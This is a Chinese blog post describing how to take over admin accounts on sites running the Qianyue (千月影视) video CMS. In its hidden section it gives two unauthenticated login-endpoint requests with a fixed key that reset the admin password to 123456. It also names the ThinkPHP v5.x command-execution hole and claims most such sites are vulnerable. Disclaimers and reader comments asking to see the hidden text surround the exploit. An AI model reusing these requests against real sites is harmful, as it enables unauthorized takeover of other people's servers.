批量检测某关键字影视站

前言

本文章只针对网络安全提供技术交流并无其他违法、恶意攻击行为,本站要求相关资料严禁用于一切违反国家法律的行为

相关资料

本站在2月份首发其漏洞点我进入,最近本站检测到很多开始盗转再加上国家严厉打击影视侵权行为经决定发布

1.png2.png

[hide]

漏洞利用

1.由于千月影视端其版本比较低下可基于ThinkPHP v5.x命令执行漏洞,可以拿下

2.本命令参考一名大佬的意见通过抓包提取出来

(1.通过域名+/login/login/yzcode?username=admin&key=465454&password=123456可以成功返回

{code: 1, msg: "成功"}code: 1msg: "成功"

(2.通过域名+/login/login/repass?username=admin&key=465454&password=123456可以成功返回

{code: 1, msg: "修改成功!请重新登陆"}code: 1msg: "修改成功!请重新登陆"

(3.执行完毕后帐号密码为admin 123456
[/hide]

备注

漏洞利用可以修改全网百分之80的站点,显而易见其危害!

郑重申明

涉及影视侵权将会被国家严厉打击,请各大站长尽早关闭勿触碰法律红线!!!

同时郑重申明请勿使用[hide]ThinkPHP v5.x命令执行漏洞[/hide],进行批量漏洞扫描攻击!!!否则追究本站将提供日志!!!

转发请带上本站连接,请勿违规转发!!!

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论

    • 猫先生博客
    • 暗里着迷0
      看看
      2022年前
    • 猫先生博客
    • -0
      you dong jiu kan 看看喽
      2022年前
    • 猫先生博客
    • 浅笑浅笑0
      看看漏洞嘿嘿嘿
      2022年前
    • 猫先生博客
    • EWE0
      还是不能看,再试一下。。
      2022年前
    • 猫先生博客
    • xmin0
      aggggg阿宝aggxxxxxxxxgggaaaaaaaaaaaaaaaaahaaa
      2022年前
    • 猫先生博客
    • 皮皮蛋0
      您好,回复了还是不能看,再试一下。。。
      2022年前
    • 猫先生博客
    • 皮皮蛋0
      不回复真的看不明白啊。。。
      2022年前
    • 猫先生博客
    • 禾厶 谷欠0
      123123123123123按时大大说
      2022年前
    • 猫先生博客
    • 10
      1234564A阿斯达
      2022年前
    • 猫先生博客
    • 流年不夏半殇0
      看看
      2022年前
    • 猫先生博客
    • 丿Muc丶黑夜0
      看看
      2022年前
    • 猫先生博客
    • 1231230
      123123123123好的哥
      2022年前
    • 猫先生博客
    • QQ987890
      梵蒂冈梵蒂冈法定
      2022年前